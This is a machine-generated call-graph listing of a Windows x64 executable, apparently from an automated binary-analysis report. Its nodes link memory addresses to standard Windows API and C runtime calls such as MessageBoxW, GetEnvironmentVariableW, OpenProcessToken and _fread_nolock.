7ff79dad1bd1 15910->15912 15944 7ff79dad199c 15911->15944 16660 7ff79dadf9f4 15911->16660 15912->15736 15912->15737 15914 7ff79dadf36c 74 API calls 15914->15908 15915 7ff79dad1985 15916 7ff79dad19a1 15915->15916 15917 7ff79dad1989 15915->15917 16664 7ff79dadf6bc 15916->16664 16667 7ff79dad2760 15917->16667 15921 7ff79dad19bf 15923 7ff79dad2760 53 API calls 15921->15923 15922 7ff79dad19d7 15924 7ff79dad1a06 15922->15924 15925 7ff79dad19ee 15922->15925 15923->15944 15927 7ff79dad1bf0 49 API calls 15924->15927 15926 7ff79dad2760 53 API calls 15925->15926 15926->15944 15928 7ff79dad1a1d 15927->15928 15929 7ff79dad1bf0 49 API calls 15928->15929 15930 7ff79dad1a68 15929->15930 15931 7ff79dadf9f4 73 API calls 15930->15931 15932 7ff79dad1a8c 15931->15932 15933 7ff79dad1aa1 15932->15933 15934 7ff79dad1ab9 15932->15934 15936 7ff79dad2760 53 API calls 15933->15936 15935 7ff79dadf6bc _fread_nolock 53 API calls 15934->15935 15937 7ff79dad1ace 15935->15937 15936->15944 15938 7ff79dad1ad4 15937->15938 15939 7ff79dad1aec 15937->15939 15940 7ff79dad2760 53 API calls 15938->15940 16684 7ff79dadf430 15939->16684 15940->15944 15943 7ff79dad25f0 53 API calls 15943->15944 15944->15914 15946 7ff79dad7e1a 15945->15946 15947 7ff79dad86b0 2 API calls 15946->15947 15948 7ff79dad7e39 GetEnvironmentVariableW 15947->15948 15949 7ff79dad7e56 ExpandEnvironmentStringsW 15948->15949 15950 7ff79dad7ea2 15948->15950 15949->15950 15951 7ff79dad7e78 15949->15951 15952 7ff79dadb870 _log10_special 8 API calls 15950->15952 15954 7ff79dad8760 2 API calls 15951->15954 15953 7ff79dad7eb4 15952->15953 15953->15746 15955 7ff79dad7e8a 15954->15955 15956 7ff79dadb870 _log10_special 8 API calls 15955->15956 15957 7ff79dad7e9a 15956->15957 15957->15746 15959 7ff79dad86b0 2 API calls 15958->15959 15960 7ff79dad7f94 15959->15960 16893 7ff79dae7548 15960->16893 15962 7ff79dad7fa6 __vcrt_freefls 15962->15762 15964 7ff79dad1c15 15963->15964 15965 7ff79dae3ca4 49 API calls 15964->15965 15966 7ff79dad1c38 15965->15966 15966->15779 15966->15785 15968 7ff79dad8415 15967->15968 16911 7ff79dad7b50 GetCurrentProcess OpenProcessToken 15968->16911 15971 7ff79dad7b50 7 API calls 15972 7ff79dad8441 15971->15972 15973 7ff79dad8474 15972->15973 15974 7ff79dad845a 15972->15974 15976 7ff79dad2590 48 API calls 15973->15976 15975 7ff79dad2590 48 API calls 15974->15975 15977 7ff79dad8472 15975->15977 15978 7ff79dad8487 LocalFree LocalFree 15976->15978 15977->15978 15979 7ff79dad84a3 15978->15979 15981 7ff79dad84af 15978->15981 16921 7ff79dad2940 15979->16921 15982 7ff79dadb870 _log10_special 8 API calls 15981->15982 16019 7ff79dad86d2 MultiByteToWideChar 16018->16019 16020 7ff79dad86f6 16018->16020 16019->16020 16022 7ff79dad870c __vcrt_freefls 16019->16022 16021 7ff79dad8713 MultiByteToWideChar 16020->16021 16020->16022 16021->16022 16022->15774 16024 7ff79dad6575 16023->16024 16025 7ff79dad38d5 16024->16025 16026 7ff79dad2760 53 API calls 16024->16026 16027 7ff79dad6b00 16025->16027 16026->16025 16028 7ff79dad6b30 16027->16028 16041 7ff79dad6b4a __vcrt_freefls 16027->16041 16028->16041 17205 7ff79dad1440 16028->17205 16030 7ff79dad6b54 16031 7ff79dad3fe0 49 API calls 16030->16031 16030->16041 16032 7ff79dad6b76 16031->16032 16033 7ff79dad6b7b 16032->16033 16034 7ff79dad3fe0 49 API calls 16032->16034 16036 7ff79dad2870 53 API calls 16033->16036 16035 7ff79dad6b9a 16034->16035 16035->16033 16037 7ff79dad3fe0 49 API calls 16035->16037 16036->16041 16038 7ff79dad6bb6 16037->16038 16038->16033 16039 7ff79dad6bbf 16038->16039 16041->15788 16055 7ff79dad30ee memcpy_s 16043->16055 16044 7ff79dadb870 _log10_special 8 API calls 16046 7ff79dad338e 16044->16046 16045 7ff79dad32e7 16045->16044 16046->15820 16062 7ff79dad83e0 LocalFree 16046->16062 16048 7ff79dad1bf0 49 API calls 16048->16055 16049 7ff79dad3309 16051 7ff79dad25f0 53 API calls 16049->16051 16051->16045 16054 7ff79dad32e9 16057 7ff79dad25f0 53 API calls 16054->16057 16055->16045 16055->16048 16055->16049 16055->16054 16056 7ff79dad2870 53 API calls 16055->16056 16060 7ff79dad32f7 16055->16060 17266 7ff79dad3f10 16055->17266 17272 7ff79dad7530 16055->17272 17284 7ff79dad15c0 16055->17284 17322 7ff79dad68e0 16055->17322 17326 7ff79dad3b40 16055->17326 17370 7ff79dad3e00 16055->17370 16056->16055 16057->16045 16061 7ff79dad25f0 53 API calls 16060->16061 16061->16045 16064 7ff79dad262a 16063->16064 16065 7ff79dae3ca4 49 API calls 16064->16065 16066 7ff79dad2652 16065->16066 16067 7ff79dad86b0 2 API calls 16066->16067 16068 7ff79dad266a 16067->16068 16069 7ff79dad268e MessageBoxA 16068->16069 16070 7ff79dad2677 MessageBoxW 16068->16070 16071 7ff79dad26a0 16069->16071 16070->16071 16075 7ff79dadb879 16074->16075 16076 7ff79dad372a 16075->16076 16077 7ff79dadbc00 IsProcessorFeaturePresent 16075->16077 16076->15834 16078 7ff79dadbc18 16077->16078 17506 7ff79dadbdf8 RtlCaptureContext 16078->17506 16084 7ff79dad3f7c 16083->16084 16085 7ff79dad86b0 2 API calls 16084->16085 16086 7ff79dad3fa4 16085->16086 16087 7ff79dad86b0 2 API calls 16086->16087 16088 7ff79dad3fb7 16087->16088 17511 7ff79dae52a4 16088->17511 16091 7ff79dadb870 _log10_special 8 API calls 16092 7ff79dad3746 16091->16092 16092->15741 16093 7ff79dad76a0 16092->16093 16094 7ff79dad76c4 16093->16094 16095 7ff79dadf9f4 73 API calls 16094->16095 16100 7ff79dad779b __vcrt_freefls 16094->16100 16096 7ff79dad76e0 16095->16096 16096->16100 17902 7ff79dae6bd8 16096->17902 16098 7ff79dadf9f4 73 API calls 16101 7ff79dad76f5 16098->16101 16099 7ff79dadf6bc _fread_nolock 53 API calls 16099->16101 16100->15745 16101->16098 16101->16099 16101->16100 16103 7ff79dadf39c 16102->16103 17917 7ff79dadf148 16103->17917 16105 7ff79dadf3b5 16105->15741 16107 7ff79dad1bf0 49 API calls 16106->16107 16108 7ff79dad3ead 16107->16108 16108->15757 16110 7ff79dad1bf0 49 API calls 16109->16110 16111 7ff79dad4010 16110->16111 16111->15785 16127 7ff79dad65bc 16112->16127 16113 7ff79dadb870 _log10_special 8 API calls 16114 7ff79dad66f1 16113->16114 16114->15792 16115 7ff79dad17e0 45 API calls 16115->16127 16116 7ff79dad675d 16118 7ff79dad25f0 53 API calls 16116->16118 16117 7ff79dad1bf0 49 API calls 16117->16127 16119 7ff79dad66df 16118->16119 16119->16113 16120 7ff79dad674a 16121 7ff79dad25f0 53 API calls 16120->16121 16121->16119 16122 7ff79dad3f10 10 API calls 16122->16127 16123 7ff79dad670d 16125 7ff79dad25f0 53 API calls 16123->16125 16124 7ff79dad7530 52 API calls 16124->16127 16125->16119 16126 7ff79dad2870 53 API calls 16126->16127 16127->16115 16127->16116 16127->16117 16127->16119 16127->16120 16127->16122 16127->16123 16127->16124 16127->16126 16128 7ff79dad6737 16127->16128 16129 7ff79dad15c0 118 API calls 16127->16129 16131 7ff79dad6720 16127->16131 16130 7ff79dad25f0 53 API calls 16128->16130 16129->16127 16130->16119 16132 7ff79dad25f0 53 API calls 16131->16132 16132->16119 17928 7ff79dad81a0 16133->17928 16135 7ff79dad6989 16136 7ff79dad81a0 3 API calls 16135->16136 16137 7ff79dad699c 16136->16137 16138 7ff79dad69cf 16137->16138 16139 7ff79dad69b4 16137->16139 16140 7ff79dad25f0 53 API calls 16138->16140 17932 7ff79dad6ea0 GetProcAddress 16139->17932 16142 7ff79dad3916 16140->16142 16142->15804 16143 7ff79dad6cd0 16142->16143 16144 7ff79dad6ced 16143->16144 16150 7ff79dad28aa 16149->16150 16151 7ff79dae3ca4 49 API calls 16150->16151 16152 7ff79dad28d2 16151->16152 16153 7ff79dad86b0 2 API calls 16152->16153 16154 7ff79dad28ea 16153->16154 16155 7ff79dad290e MessageBoxA 16154->16155 16156 7ff79dad28f7 MessageBoxW 16154->16156 16157 7ff79dad2920 16155->16157 16156->16157 16158 7ff79dadb870 _log10_special 8 API calls 16157->16158 16159 7ff79dad2930 16158->16159 16160 7ff79dad6780 16159->16160 16161 7ff79dad68d6 16160->16161 16166 7ff79dad6792 16160->16166 16161->15790 17997 7ff79dad5af0 16167->17997 16175 7ff79dad30b9 16176 7ff79dad33a0 16175->16176 16177 7ff79dad33ae 16176->16177 16178 7ff79dad33bf 16177->16178 18285 7ff79dad8180 FreeLibrary 16177->18285 16178->15799 16197 7ff79dae986c 16180->16197 16184 7ff79dae9b5f 16184->15882 16235 7ff79dae477c EnterCriticalSection 16190->16235 16198 7ff79dae98c3 16197->16198 16199 7ff79dae9888 GetLastError 16197->16199 16198->16184 16203 7ff79dae98d8 16198->16203 16200 7ff79dae9898 16199->16200 16210 7ff79daea6a0 16200->16210 16204 7ff79dae98f4 GetLastError SetLastError 16203->16204 16205 7ff79dae990c 16203->16205 16204->16205 16205->16184 16206 7ff79dae9c10 IsProcessorFeaturePresent 16205->16206 16207 7ff79dae9c23 16206->16207 16227 7ff79dae9924 16207->16227 16211 7ff79daea6bf FlsGetValue 16210->16211 16212 7ff79daea6da FlsSetValue 16210->16212 16213 7ff79daea6d4 16211->16213 16215 7ff79dae98b3 SetLastError 16211->16215 16214 7ff79daea6e7 16212->16214 16212->16215 16213->16212 16216 7ff79daedea8 _get_daylight 11 API calls 16214->16216 16215->16198 16217 7ff79daea6f6 16216->16217 16218 7ff79daea714 FlsSetValue 16217->16218 16219 7ff79daea704 FlsSetValue 16217->16219 16221 7ff79daea732 16218->16221 16222 7ff79daea720 FlsSetValue 16218->16222 16220 7ff79daea70d 16219->16220 16224 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16220->16224 16223 7ff79daea204 _get_daylight 11 API calls 16221->16223 16222->16220 16225 7ff79daea73a 16223->16225 16224->16215 16226 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16225->16226 16226->16215 16228 7ff79dae995e memcpy_s __FrameHandler3::FrameUnwindToEmptyState 16227->16228 16229 7ff79dae9986 RtlCaptureContext RtlLookupFunctionEntry 16228->16229 16230 7ff79dae99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16229->16230 16231 7ff79dae99c0 RtlVirtualUnwind 16229->16231 16234 7ff79dae9a48 __FrameHandler3::FrameUnwindToEmptyState 16230->16234 16231->16230 16232 7ff79dadb870 _log10_special 8 API calls 16233 7ff79dae9a67 GetCurrentProcess TerminateProcess 16232->16233 16234->16232 16237 7ff79dad33ec GetModuleFileNameW 16236->16237 16237->15886 16237->15887 16239 7ff79dad85df FindClose 16238->16239 16240 7ff79dad85f2 16238->16240 16239->16240 16241 7ff79dadb870 _log10_special 8 API calls 16240->16241 16242 7ff79dad3442 16241->16242 16242->15891 16242->15892 16244 7ff79dadbb70 16243->16244 16245 7ff79dad29fc GetLastError 16244->16245 16246 7ff79dad2a29 16245->16246 16267 7ff79dae3ef8 16246->16267 16251 7ff79dadb870 _log10_special 8 API calls 16252 7ff79dad2ae5 16251->16252 16252->15903 16254 7ff79dad8660 GetFinalPathNameByHandleW CloseHandle 16253->16254 16255 7ff79dad3458 16253->16255 16254->16255 16255->15899 16255->15902 16257 7ff79dad26fa 16256->16257 16258 7ff79dae3ef8 48 API calls 16257->16258 16259 7ff79dad2722 MessageBoxW 16258->16259 16260 7ff79dadb870 _log10_special 8 API calls 16259->16260 16261 7ff79dad274c 16260->16261 16261->15903 16263 7ff79dad878a WideCharToMultiByte 16262->16263 16264 7ff79dad87b5 16262->16264 16263->16264 16266 7ff79dad87cb __vcrt_freefls 16263->16266 16265 7ff79dad87d2 WideCharToMultiByte 16264->16265 16264->16266 16265->16266 16266->15896 16269 7ff79dae3f52 16267->16269 16268 7ff79dae3f77 16271 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16268->16271 16269->16268 16270 7ff79dae3fb3 16269->16270 16289 7ff79dae22b0 16270->16289 16273 7ff79dae3fa1 16271->16273 16276 7ff79dadb870 _log10_special 8 API calls 16273->16276 16274 7ff79dae4094 16275 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16274->16275 16275->16273 16278 7ff79dad2a54 FormatMessageW 16276->16278 16285 7ff79dad2590 16278->16285 16279 7ff79dae40ba 16279->16274 16282 7ff79dae40c4 16279->16282 16280 7ff79dae4069 16283 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16280->16283 16281 7ff79dae4060 16281->16274 16281->16280 16284 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16282->16284 16283->16273 16284->16273 16286 7ff79dad25b5 16285->16286 16287 7ff79dae3ef8 48 API calls 16286->16287 16288 7ff79dad25d8 MessageBoxW 16287->16288 16288->16251 16290 7ff79dae22ee 16289->16290 16291 7ff79dae22de 16289->16291 16292 7ff79dae22f7 16290->16292 16296 7ff79dae2325 16290->16296 16293 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16291->16293 16294 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16292->16294 16295 7ff79dae231d 16293->16295 16294->16295 16295->16274 16295->16279 16295->16280 16295->16281 16296->16291 16296->16295 16300 7ff79dae2cc4 16296->16300 16333 7ff79dae2710 16296->16333 16370 7ff79dae1ea0 16296->16370 16301 7ff79dae2d06 16300->16301 16302 7ff79dae2d77 16300->16302 16303 7ff79dae2da1 16301->16303 16304 7ff79dae2d0c 16301->16304 16305 7ff79dae2dd0 16302->16305 16306 7ff79dae2d7c 16302->16306 16393 7ff79dae1074 16303->16393 16308 7ff79dae2d40 16304->16308 16309 7ff79dae2d11 16304->16309 16307 7ff79dae2ddf 16305->16307 16310 7ff79dae2de7 16305->16310 16311 7ff79dae2dda 16305->16311 16314 7ff79dae2db1 16306->16314 16316 7ff79dae2d7e 16306->16316 16331 7ff79dae2e10 16307->16331 16411 7ff79dae1484 16307->16411 16308->16307 16313 7ff79dae2d17 16308->16313 16309->16310 16309->16313 16407 7ff79dae39cc 16310->16407 16311->16303 16311->16307 16315 7ff79dae2d20 16313->16315 16321 7ff79dae2d52 16313->16321 16328 7ff79dae2d3b 16313->16328 16400 7ff79dae0c64 16314->16400 16315->16331 16373 7ff79dae3478 16315->16373 16316->16315 16320 7ff79dae2d8d 16316->16320 16320->16303 16323 7ff79dae2d92 16320->16323 16321->16331 16383 7ff79dae37b4 16321->16383 16323->16331 16389 7ff79dae3878 16323->16389 16325 7ff79dadb870 _log10_special 8 API calls 16327 7ff79dae310a 16325->16327 16327->16296 16328->16331 16332 7ff79dae2ffc 16328->16332 16418 7ff79dae3ae0 16328->16418 16331->16325 16332->16331 16424 7ff79daedd18 16332->16424 16334 7ff79dae2734 16333->16334 16335 7ff79dae271e 16333->16335 16336 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16334->16336 16337 7ff79dae2774 16334->16337 16335->16337 16338 7ff79dae2d06 16335->16338 16339 7ff79dae2d77 16335->16339 16336->16337 16337->16296 16340 7ff79dae2da1 16338->16340 16341 7ff79dae2d0c 16338->16341 16342 7ff79dae2dd0 16339->16342 16343 7ff79dae2d7c 16339->16343 16350 7ff79dae1074 38 API calls 16340->16350 16344 7ff79dae2d40 16341->16344 16345 7ff79dae2d11 16341->16345 16348 7ff79dae2de7 16342->16348 16349 7ff79dae2dda 16342->16349 16355 7ff79dae2ddf 16342->16355 16346 7ff79dae2db1 16343->16346 16347 7ff79dae2d7e 16343->16347 16351 7ff79dae2d17 16344->16351 16344->16355 16345->16348 16345->16351 16353 7ff79dae0c64 38 API calls 16346->16353 16352 7ff79dae2d20 16347->16352 16357 7ff79dae2d8d 16347->16357 16356 7ff79dae39cc 45 API calls 16348->16356 16349->16340 16349->16355 16365 7ff79dae2d3b 16350->16365 16351->16352 16358 7ff79dae2d52 16351->16358 16351->16365 16354 7ff79dae3478 47 API calls 16352->16354 16368 7ff79dae2e10 16352->16368 16353->16365 16354->16365 16359 7ff79dae1484 38 API calls 16355->16359 16355->16368 16356->16365 16357->16340 16360 7ff79dae2d92 16357->16360 16361 7ff79dae37b4 46 API calls 16358->16361 16358->16368 16359->16365 16363 7ff79dae3878 37 API calls 16360->16363 16360->16368 16361->16365 16362 7ff79dadb870 _log10_special 8 API calls 16364 7ff79dae310a 16362->16364 16363->16365 16364->16296 16366 7ff79dae3ae0 45 API calls 16365->16366 16365->16368 16369 7ff79dae2ffc 16365->16369 16366->16369 16367 7ff79daedd18 46 API calls 16367->16369 16368->16362 16369->16367 16369->16368 16643 7ff79dae02e8 16370->16643 16374 7ff79dae349e 16373->16374 16436 7ff79dadfea0 16374->16436 16379 7ff79dae35e3 16381 7ff79dae3ae0 45 API calls 16379->16381 16382 7ff79dae3671 16379->16382 16380 7ff79dae3ae0 45 API calls 16380->16379 16381->16382 16382->16328 16385 7ff79dae37e9 16383->16385 16384 7ff79dae382e 16384->16328 16385->16384 16386 7ff79dae3807 16385->16386 16387 7ff79dae3ae0 45 API calls 16385->16387 16388 7ff79daedd18 46 API calls 16386->16388 16387->16386 16388->16384 16392 7ff79dae3899 16389->16392 16390 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16391 7ff79dae38ca 16390->16391 16391->16328 16392->16390 16392->16391 16394 7ff79dae10a7 16393->16394 16395 7ff79dae10d6 16394->16395 16397 7ff79dae1193 16394->16397 16399 7ff79dae1113 16395->16399 16575 7ff79dadff48 16395->16575 16398 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16397->16398 16398->16399 16399->16328 16401 7ff79dae0c97 16400->16401 16402 7ff79dae0cc6 16401->16402 16404 7ff79dae0d83 16401->16404 16403 7ff79dadff48 12 API calls 16402->16403 16406 7ff79dae0d03 16402->16406 16403->16406 16405 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16404->16405 16405->16406 16406->16328 16408 7ff79dae3a0f 16407->16408 16410 7ff79dae3a13 __crtLCMapStringW 16408->16410 16583 7ff79dae3a68 16408->16583 16410->16328 16412 7ff79dae14b7 16411->16412 16413 7ff79dae14e6 16412->16413 16415 7ff79dae15a3 16412->16415 16414 7ff79dadff48 12 API calls 16413->16414 16417 7ff79dae1523 16413->16417 16414->16417 16416 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16415->16416 16416->16417 16417->16328 16419 7ff79dae3af7 16418->16419 16587 7ff79daeccc8 16419->16587 16425 7ff79daedd49 16424->16425 16434 7ff79daedd57 16424->16434 16426 7ff79daedd77 16425->16426 16427 7ff79dae3ae0 45 API calls 16425->16427 16425->16434 16428 7ff79daeddaf 16426->16428 16429 7ff79daedd88 16426->16429 16427->16426 16431 7ff79daeddd9 16428->16431 16432 7ff79daede3a 16428->16432 16428->16434 16633 7ff79daef3b0 16429->16633 16431->16434 16636 7ff79daeebb0 16431->16636 16433 7ff79daeebb0 _fread_nolock MultiByteToWideChar 16432->16433 16433->16434 16434->16332 16437 7ff79dadfed7 16436->16437 16443 7ff79dadfec6 16436->16443 16438 7ff79daec90c _fread_nolock 12 API calls 16437->16438 16437->16443 16439 7ff79dadff04 16438->16439 16440 7ff79dadff18 16439->16440 16441 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16439->16441 16442 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16440->16442 16441->16440 16442->16443 16444 7ff79daed880 16443->16444 16445 7ff79daed8d0 16444->16445 16446 7ff79daed89d 16444->16446 16445->16446 16449 7ff79daed902 16445->16449 16447 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16446->16447 16448 7ff79dae35c1 16447->16448 16448->16379 16448->16380 16455 7ff79daeda15 16449->16455 16459 7ff79daed94a 16449->16459 16450 7ff79daedb07 16499 7ff79daecd6c 16450->16499 16452 7ff79daedacd 16492 7ff79daed104 16452->16492 16454 7ff79daeda9c 16485 7ff79daed3e4 16454->16485 16455->16450 16455->16452 16455->16454 16457 7ff79daeda5f 16455->16457 16458 7ff79daeda55 16455->16458 16475 7ff79daed614 16457->16475 16458->16452 16461 7ff79daeda5a 16458->16461 16459->16448 16466 7ff79dae97b4 16459->16466 16461->16454 16461->16457 16464 7ff79dae9c10 _isindst 17 API calls 16465 7ff79daedb64 16464->16465 16467 7ff79dae97cb 16466->16467 16468 7ff79dae97c1 16466->16468 16469 7ff79dae43f4 _get_daylight 11 API calls 16467->16469 16468->16467 16473 7ff79dae97e6 16468->16473 16470 7ff79dae97d2 16469->16470 16508 7ff79dae9bf0 16470->16508 16472 7ff79dae97de 16472->16448 16472->16464 16473->16472 16474 7ff79dae43f4 _get_daylight 11 API calls 16473->16474 16474->16470 16511 7ff79daf33bc 16475->16511 16479 7ff79daed6bc 16480 7ff79daed6c0 16479->16480 16481 7ff79daed711 16479->16481 16482 7ff79daed6dc 16479->16482 16480->16448 16564 7ff79daed200 16481->16564 16560 7ff79daed4bc 16482->16560 16486 7ff79daf33bc 38 API calls 16485->16486 16487 7ff79daed42e 16486->16487 16488 7ff79daf2e04 37 API calls 16487->16488 16489 7ff79daed47e 16488->16489 16490 7ff79daed482 16489->16490 16491 7ff79daed4bc 45 API calls 16489->16491 16490->16448 16491->16490 16493 7ff79daf33bc 38 API calls 16492->16493 16494 7ff79daed14f 16493->16494 16495 7ff79daf2e04 37 API calls 16494->16495 16496 7ff79daed1a7 16495->16496 16497 7ff79daed1ab 16496->16497 16498 7ff79daed200 45 API calls 16496->16498 16497->16448 16498->16497 16500 7ff79daecde4 16499->16500 16501 7ff79daecdb1 16499->16501 16503 7ff79daecdfc 16500->16503 16505 7ff79daece7d 16500->16505 16502 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16501->16502 16507 7ff79daecddd memcpy_s 16502->16507 16504 7ff79daed104 46 API calls 16503->16504 16504->16507 16506 7ff79dae3ae0 45 API calls 16505->16506 16505->16507 16506->16507 16507->16448 16509 7ff79dae9a88 _invalid_parameter_noinfo 37 API calls 16508->16509 16510 7ff79dae9c09 16509->16510 16510->16472 16512 7ff79daf340f fegetenv 16511->16512 16513 7ff79daf713c 37 API calls 16512->16513 16516 7ff79daf3462 16513->16516 16514 7ff79daf348f 16518 7ff79dae97b4 __std_exception_copy 37 API calls 16514->16518 16515 7ff79daf3552 16517 7ff79daf713c 37 API calls 16515->16517 16516->16515 16521 7ff79daf352c 16516->16521 16522 7ff79daf347d 16516->16522 16519 7ff79daf357c 16517->16519 16520 7ff79daf350d 16518->16520 16523 7ff79daf713c 37 API calls 16519->16523 16524 7ff79daf4634 16520->16524 16530 7ff79daf3515 16520->16530 16525 7ff79dae97b4 __std_exception_copy 37 API calls 16521->16525 16522->16514 16522->16515 16526 7ff79daf358d 16523->16526 16527 7ff79dae9c10 _isindst 17 API calls 16524->16527 16525->16520 16528 7ff79daf7330 20 API calls 16526->16528 16529 7ff79daf4649 16527->16529 16539 7ff79daf35f6 memcpy_s 16528->16539 16531 7ff79dadb870 _log10_special 8 API calls 16530->16531 16532 7ff79daed661 16531->16532 16556 7ff79daf2e04 16532->16556 16533 7ff79daf399f memcpy_s 16534 7ff79daf3cdf 16536 7ff79daf2f20 37 API calls 16534->16536 16535 7ff79daf3637 memcpy_s 16551 7ff79daf3f7b memcpy_s 16535->16551 16552 7ff79daf3a93 memcpy_s 16535->16552 16537 7ff79daf43f7 16536->16537 16544 7ff79daf464c memcpy_s 37 API calls 16537->16544 16555 7ff79daf4452 16537->16555 16538 7ff79daf3c8b 16538->16534 16540 7ff79daf464c memcpy_s 37 API calls 16538->16540 16539->16533 16539->16535 16541 7ff79dae43f4 _get_daylight 11 API calls 16539->16541 16540->16534 16542 7ff79daf3a70 16541->16542 16543 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16542->16543 16543->16535 16544->16555 16545 7ff79daf45d8 16547 7ff79daf713c 37 API calls 16545->16547 16546 7ff79dae43f4 11 API calls _get_daylight 16546->16552 16547->16530 16548 7ff79dae43f4 11 API calls _get_daylight 16548->16551 16549 7ff79daf2f20 37 API calls 16549->16555 16550 7ff79dae9bf0 37 API calls _invalid_parameter_noinfo 16550->16551 16551->16534 16551->16538 16551->16548 16551->16550 16552->16538 16552->16546 16553 7ff79dae9bf0 37 API calls _invalid_parameter_noinfo 16552->16553 16553->16552 16554 7ff79daf464c memcpy_s 37 API calls 16554->16555 16555->16545 16555->16549 16555->16554 16557 7ff79daf2e23 16556->16557 16558 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16557->16558 16559 7ff79daf2e4e memcpy_s 16557->16559 16558->16559 16559->16479 16561 7ff79daed4e8 memcpy_s 16560->16561 16562 7ff79dae3ae0 45 API calls 16561->16562 16563 7ff79daed5a2 memcpy_s 16561->16563 16562->16563 16563->16480 16565 7ff79daed23b 16564->16565 16569 7ff79daed288 memcpy_s 16564->16569 16566 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16565->16566 16567 7ff79daed267 16566->16567 16567->16480 16568 7ff79daed2f3 16570 7ff79dae97b4 __std_exception_copy 37 API calls 16568->16570 16569->16568 16571 7ff79dae3ae0 45 API calls 16569->16571 16574 7ff79daed335 memcpy_s 16570->16574 16571->16568 16572 7ff79dae9c10 _isindst 17 API calls 16573 7ff79daed3e0 16572->16573 16574->16572 16576 7ff79dadff7f 16575->16576 16577 7ff79dadff6e 16575->16577 16576->16577 16578 7ff79daec90c _fread_nolock 12 API calls 16576->16578 16577->16399 16579 7ff79dadffb0 16578->16579 16580 7ff79dadffc4 16579->16580 16581 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16579->16581 16582 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16580->16582 16581->16580 16582->16577 16584 7ff79dae3a86 16583->16584 16585 7ff79dae3a8e 16583->16585 16586 7ff79dae3ae0 45 API calls 16584->16586 16585->16410 16586->16585 16588 7ff79daecce1 16587->16588 16589 7ff79dae3b1f 16587->16589 16588->16589 16595 7ff79daf2614 16588->16595 16591 7ff79daecd34 16589->16591 16592 7ff79dae3b2f 16591->16592 16593 7ff79daecd4d 16591->16593 16592->16332 16593->16592 16630 7ff79daf1960 16593->16630 16607 7ff79daea460 GetLastError 16595->16607 16598 7ff79daf266e 16598->16589 16608 7ff79daea484 FlsGetValue 16607->16608 16609 7ff79daea4a1 FlsSetValue 16607->16609 16611 7ff79daea49b 16608->16611 16626 7ff79daea491 16608->16626 16610 7ff79daea4b3 16609->16610 16609->16626 16613 7ff79daedea8 _get_daylight 11 API calls 16610->16613 16611->16609 16612 7ff79daea50d SetLastError 16614 7ff79daea52d 16612->16614 16615 7ff79daea51a 16612->16615 16616 7ff79daea4c2 16613->16616 16617 7ff79dae9814 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16614->16617 16615->16598 16629 7ff79daef5e8 EnterCriticalSection 16615->16629 16618 7ff79daea4e0 FlsSetValue 16616->16618 16619 7ff79daea4d0 FlsSetValue 16616->16619 16620 7ff79daea532 16617->16620 16622 7ff79daea4fe 16618->16622 16623 7ff79daea4ec FlsSetValue 16618->16623 16621 7ff79daea4d9 16619->16621 16624 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16621->16624 16625 7ff79daea204 _get_daylight 11 API calls 16622->16625 16623->16621 16624->16626 16627 7ff79daea506 16625->16627 16626->16612 16628 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16627->16628 16628->16612 16631 7ff79daea460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16630->16631 16632 7ff79daf1969 16631->16632 16639 7ff79daf6098 16633->16639 16638 7ff79daeebb9 MultiByteToWideChar 16636->16638 16642 7ff79daf60fc 16639->16642 16640 7ff79dadb870 _log10_special 8 API calls 16641 7ff79daef3cd 16640->16641 16641->16434 16642->16640 16644 7ff79dae032f 16643->16644 16645 7ff79dae031d 16643->16645 16647 7ff79dae033d 16644->16647 16652 7ff79dae0379 16644->16652 16646 7ff79dae43f4 _get_daylight 11 API calls 16645->16646 16648 7ff79dae0322 16646->16648 16649 7ff79dae9b24 _invalid_parameter_noinfo 37 API calls 16647->16649 16650 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16648->16650 16658 7ff79dae032d 16649->16658 16650->16658 16651 7ff79dae06f5 16653 7ff79dae43f4 _get_daylight 11 API calls 16651->16653 16651->16658 16652->16651 16654 7ff79dae43f4 _get_daylight 11 API calls 16652->16654 16655 7ff79dae0989 16653->16655 16656 7ff79dae06ea 16654->16656 16659 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16655->16659 16657 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 16656->16657 16657->16651 16658->16296 16659->16658 16661 7ff79dadfa24 16660->16661 16690 7ff79dadf784 16661->16690 16663 7ff79dadfa3d 16663->15915 16702 7ff79dadf6dc 16664->16702 16668 7ff79dad277c 16667->16668 16669 7ff79dae43f4 _get_daylight 11 API calls 16668->16669 16670 7ff79dad2799 16669->16670 16716 7ff79dae3ca4 16670->16716 16675 7ff79dad1bf0 49 API calls 16676 7ff79dad2807 16675->16676 16677 7ff79dad86b0 2 API calls 16676->16677 16678 7ff79dad281f 16677->16678 16679 7ff79dad2843 MessageBoxA 16678->16679 16680 7ff79dad282c MessageBoxW 16678->16680 16681 